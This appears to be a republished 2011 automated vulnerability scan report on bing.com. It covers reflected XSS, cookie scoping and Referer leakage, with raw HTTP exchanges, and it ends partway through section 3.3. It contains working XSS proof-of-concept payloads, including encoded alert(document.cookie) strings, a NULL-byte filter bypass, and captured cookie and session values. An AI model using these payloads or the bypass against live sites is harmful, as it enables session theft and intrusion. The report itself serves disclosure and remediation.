Report generated by XSS.CX at Fri Mar 25 20:57:09 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

2. Cookie scoped to parent domain

2.1. http://www.bing.com/local/aa461'-alert(1)-'6f0e1fe887b

2.2. http://www.bing.com/maps

2.3. http://www.bing.com/videos

3. Cross-domain Referer leakage

3.1. http://www.bing.com/fd/fb/mulmfg

3.2. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887ba3421'-alert(1)-'a961c250743/undefined/js/LSV.js

3.3. http://www.bing.com/local/us/dc/washington/restaurants/

3.4. http://www.bing.com/maps/default.aspx

3.5. http://www.bing.com/profile/history

3.6. http://www.bing.com/search

3.7. http://www.bing.com/search

3.8. http://www.bing.com/search

3.9. http://www.bing.com/search

3.10. http://www.bing.com/search

3.11. http://www.bing.com/settings.aspx

3.12. http://www.bing.com/settings.aspx

3.13. http://www.bing.com/us/dc/washington/restaurantsb8e13'-alert(1)-'2806c252a89/

4. Cookie without HttpOnly flag set

4.1. http://www.bing.com/local/

4.2. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887ba3421'-alert(1)-'a961c250743/undefined/js/LSV.js

4.3. http://www.bing.com/local/aa461'-alert(1)-'6f0e1fe887b

4.4. http://www.bing.com/local/aa461'-alert(1)-'6f0e1fe887b/

4.5. http://www.bing.com/local/us/dc/washington/restaurants/

4.6. http://www.bing.com/maps

4.7. http://www.bing.com/videos

5. Email addresses disclosed

5.1. http://www.bing.com/travel/jsxc.vjs

5.2. http://www.bing.com/travel/scripts/sCode.js

6. Credit card numbers disclosed

7. Content type incorrectly stated

7.1. http://www.bing.com/entertainment/services/user/settings

7.2. http://www.bing.com/fd/AnswerBarHandler

7.3. http://www.bing.com/getimage

7.4. http://www.bing.com/maps/default.aspx

7.5. http://www.bing.com/search

7.6. http://www.bing.com/travel/jsdf.vjs

7.7. http://www.bing.com/travel/jsrp.vjs



1. Cross-site scripting (reflected)  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /entertainment/services/user/settings

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f0e30<script>alert(1)</script>9c6a0e4aa7a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

GET /entertainment/services/user/settings?callback=jsonp1301101466664f0e30<script>alert(1)</script>9c6a0e4aa7a&responseEncoding=json HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/entertainment?FORM=Z9LH6
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _HOP=; RMS=F=Oi&A=SAAGAAAAAAAQ; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099&CW=1410&bIm=915

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 208
Content-Type: text/html; charset=utf-8
Expires: -1
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:06:21 GMT
Connection: close

jsonp1301101466664f0e30<script>alert(1)</script>9c6a0e4aa7a({"user":{"settings":{"location":{"$latitude":'38.906898498',"$longitude":'-77.028396606',"$":'Washington, District Of Columbia'},"$":null},"$":""}})

2. Cookie scoped to parent domain  previous  next
There are 3 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


2.1. http://www.bing.com/local/aa461'-alert(1)-'6f0e1fe887b  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(1)-'6f0e1fe887b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/aa461'-alert(1)-'6f0e1fe887b HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CID=fe59c2dc18aa4020b87499fabbc9ae1d; CDate=2/26/2011 12:18:19 AM; SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; _HOP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099; RMS=F=OC

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.bing.com:80/local/aa461'-alert(1)-'6f0e1fe887b/
X-BM-TraceID: 2a28fc725dfd4392bafb62ac203ea6a3
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001210
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:03:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _HOP=I=1&TS=1301101434; domain=.bing.com; path=/
Content-Length: 175

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.bing.com:80/local/aa461'-alert(1)-'6f0e1fe887b/">here</a>.</h2>
</body></html>

2.2. http://www.bing.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL=true; htsk=false; cbout=false; SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1693482&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _HOP=I=1&TS=1301100909

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/maps/
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Sat, 26 Mar 2011 00:55:10 GMT
Connection: close
Set-Cookie: _HOP=I=2&TS=1301100910; domain=.bing.com; path=/


2.3. http://www.bing.com/videos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=9557F8C0DAF347BDB5B78C82AB37BFF1

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Sat, 26 Mar 2011 01:24:09 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Mon, 25-Mar-2013 01:24:09 GMT; domain=.bing.com; path=/videos
Set-Cookie: _HOP=I=1&TS=1301102649; domain=.bing.com; path=/


3. Cross-domain Referer leakage  previous  next
There are 13 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


3.1. http://www.bing.com/fd/fb/mulmfg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/fb/mulmfg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /fd/fb/mulmfg?IG=f8d61f728c6f438090026fdef4b23378&IID=FD.1&ru=http%3A%2F%2Fwww.bing.com%2Fmaps%2F&CAH=1 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/maps/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FBB=R=0; SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; _HOP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099; RMS=F=O

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Length: 1494
Date: Sat, 26 Mar 2011 00:56:08 GMT
Connection: close

<li><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1301100968&amp;rver=6.0.5286.0&amp;wp=MBI&amp;wreply=http:%2F%2Fwww.bing.com%2FPassport.aspx%3Frequrl%3Dhttp%253a%252f%252fwww.bing.com%252fmaps%252f&amp;lc=1033&amp;id=264960" onclick="if(_w.sb_tlmfn) return _w.sb_tlmfn(arguments[0]);return true;" onmousedown="return si_T('&amp;ID=FD.FD.1,4.1')"><span id="sw_tliw">
...[SNIP]...
</a> &#xb7; <a href="http://go.microsoft.com/fwlink/?LinkID=191371" onmousedown="return si_T('&amp;ID=FD.FD.1,9.1')"><span>
...[SNIP]...

3.2. http://www.bing.com/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887ba3421'-alert(1)-'a961c250743/undefined/js/LSV.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887ba3421'-alert(1)-'a961c250743/undefined/js/LSV.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887ba3421'-alert(1)-'a961c250743/undefined/js/LSV.js?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CID=fe59c2dc18aa4020b87499fabbc9ae1d; CDate=2/26/2011 12:18:19 AM; SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; _HOP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099; RMS=F=O

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: b7afce04e6d2437594326ff9a9979381
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState:
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001208
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:03:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)-'6f0e1fe887ba3421'-alert(1)-'a961c250743/undefined/js
Content-Length: 23624


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,38.1')">Hotmail</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,52.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808582.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,62.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?productkey=wlsearchlocal&amp;locale=en-us&amp;P1=footerlivelocal&amp;P2=&amp;P3=&amp;P4=LLSV&amp;P5=&amp;P6=js%2c%20undefined%2c%20aa461%27-alert%28document.cookie%29-%276f0e1fe887ba3421%27-alert%281%29-%27a961c250743&amp;P7=Original&amp;P8=&amp;P9=&amp;P10=&amp;P11=&amp;P13=&amp;searchtype=LiveLocalSearch&amp;backurl=http%3a%2f%2fwww.bing.com%3a80%2flocalsearch%2fdefault.aspx%3fwhere%3djs%252c%2bundefined%252c%2baa461%27-alert%28%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565%29-%276f0e1fe887ba3421%27-alert%281%29-%27a961c250743%26cb%3d20110127.750" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,64.1')">Tell us what you think</a>
...[SNIP]...

3.3. http://www.bing.com/local/us/dc/washington/restaurants/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/dc/washington/restaurants/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /local/us/dc/washington/restaurants/?cat=11168&q=Restaurants&maxcount=4797&FORM=LLSV HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CID=fe59c2dc18aa4020b87499fabbc9ae1d; CDate=2/26/2011 12:18:19 AM; BID=53585a90f348495cbe705d0124981ec0; VE_LSV=cache=0; SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _SS=SID=0B4014F62A18466497C10109D4CCD2AB&hIm=099; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 147c0045befc4bdcb48dadffb4dcce83
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001206
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:04:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/us/dc/washington/restaurants
Content-Length: 91062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,38.1')">Hotmail</a>
...[SNIP]...
Image" href onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); VE_AnalyticsEngine.LogAdClick(this.id, document.getElementById(this.id), '0', 'YellowPages-LSV', 'DLPAV');"><img id="AdResultSetControl_rpt1_ctl00_sritem_ac1_imgImage" class="acClickable" src="http://c66.yellowpages.com/newdisplay_distr/ypc/DC272700.gif" style="border-width:0px;" /></a>
...[SNIP]...
MDUyRUQ=" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); VE_AnalyticsEngine.LogAdClick(this.id, document.getElementById(this.id), '1', 'YellowPages-LSV', 'DWLPACV');"><img id="AdResultSetControl_rpt1_ctl01_sritem_ac1_imgImage" class="acClickable" src="http://c66.yellowpages.com/newdisplay_distr/ypc/DC255241.gif" style="border-width:0px;" /></a>
...[SNIP]...
<div id="AdResultSetControl_adsSponsored" class="adsSponsoredContainer">
<a id="AdResultSetControl_adsSponsoredLabel" class="adsSponsoredLink" href="http://listings.yellowpages.com/documents/special_offers/jump-msn.asp?from=maps_localsearch_com" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), '', '', ''); ">Advertise here</a>
...[SNIP]...
<div id="srs_rpt1_ctl00_sritem_ec2_brandHost" class="ecBrand ecPhotoThumbnailContainer">
<img id="srs_rpt1_ctl00_sritem_ec2_brandLogo" class="ecClickable" onclick="window.open('http\x3A\x2F\x2Fwww.bing.com\x2Flocal\x2Fdetails.aspx\x3Flid\x3DYN165x3125023\x26q\x3DRestaurants\x26tab\x3Dphotos\x26qt\x3Dyp\x26tid\x3D147c0045befc4bdcb48dadffb4dcce83\x26FORM\x3DLLSV', '_self');VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3125023', '0', '');" Width="75" align="center" src="http://byfiles.storage.msn.com/y1pqiyeF9LCo-dLWl58_T7ZqCIRHsJMI75PmY-JbXgtPMb7YnezaSYYHjhS1o1hTQjOAcgtF0gTKJ8" style="border-width:0px;" />
<a id="srs_rpt1_ctl00_sritem_ec2_brandAction" class="ecBrandAction" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">
...[SNIP]...
<div id="srs_rpt1_ctl00_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl00_sritem_ec2_ohlWeb" href="http://www.zaytinya.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3125023', '0', ''); " target="_self">Website</a>
...[SNIP]...
</a>

<a id="srs_rpt1_ctl00_sritem_ec2_ohlMenu" class=" ecDotDynamic" href="http://www.zaytinya.com/index.php/menus/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3125023', '0', ''); ">Menu</a>
...[SNIP]...
<div id="srs_rpt1_ctl01_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl01_sritem_ec2_ohlWeb" href="http://www.tabardinn.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x172195977', '1', ''); " target="_self">Website</a>
...[SNIP]...
<div id="srs_rpt1_ctl02_sritem_ec2_brandHost" class="ecBrand ecPhotoThumbnailContainer">
<img id="srs_rpt1_ctl02_sritem_ec2_brandLogo" class="ecClickable" onclick="window.open('http\x3A\x2F\x2Fwww.bing.com\x2Flocal\x2Fdetails.aspx\x3Flid\x3DYN165x3154350\x26q\x3DRestaurants\x26tab\x3Dphotos\x26qt\x3Dyp\x26tid\x3D147c0045befc4bdcb48dadffb4dcce83\x26FORM\x3DLLSV', '_self');VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3154350', '2', '');" Width="75" align="center" src="http://images.travelnow.com/hotels/1000000/10000/7100/7004/7004_42_t.jpg" style="border-width:0px;" />
<a id="srs_rpt1_ctl02_sritem_ec2_brandAction" class="ecBrandAction" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">
...[SNIP]...
<div id="srs_rpt1_ctl02_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl02_sritem_ec2_ohlWeb" href="http://thechurchillhotel.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3154350', '2', ''); " target="_self">Website</a>
...[SNIP]...
<div id="srs_rpt1_ctl03_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl03_sritem_ec2_ohlWeb" href="http://www.benschilibowl.com/ordereze/default.aspx" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3153878', '3', ''); " target="_self">Website</a>
...[SNIP]...
</a>

<a id="srs_rpt1_ctl03_sritem_ec2_ohlMenu" class=" ecDotDynamic" href="http://washingtondc.citysearch.com/profile/menu/2150013/washington_dc/ben_s_chili_bowl.html" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3153878', '3', ''); ">Menu</a>
<a id="srs_rpt1_ctl03_sritem_ec2_ohlBookOnline" class=" ecDotDynamic" href="http://washingtondc.citysearch.com/profile/reservation/2150013/washington_dc/ben_s_chili_bowl.html" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3153878', '3', ''); ">Reservations</a>
...[SNIP]...
<div id="srs_rpt1_ctl04_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl04_sritem_ec2_ohlWeb" href="http://www.ebbitt.com/main/home.cfm?Section=Main&amp;Category=About_the_Ebbitt" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3137576', '4', ''); " target="_self">Website</a>
...[SNIP]...
</a>

<a id="srs_rpt1_ctl04_sritem_ec2_ohlMenu" class=" ecDotDynamic" href="http://washingtondc.citysearch.com/profile/menu/2134497/washington_dc/old_ebbitt_grill.html" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3137576', '4', ''); ">Menu</a>
...[SNIP]...
<div id="srs_rpt1_ctl05_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl05_sritem_ec2_ohlWeb" href="http://www.citronelledc.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x220138323', '5', ''); " target="_self">Website</a>
...[SNIP]...
</a>

<a id="srs_rpt1_ctl05_sritem_ec2_ohlMenu" class=" ecDotDynamic" href="http://www.citronelledc.com/pdf/menu.pdf" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x220138323', '5', ''); ">Menu</a>
...[SNIP]...
<div id="srs_rpt1_ctl06_sritem_ec2_actionLinksBottom" class="ecActionLinks">
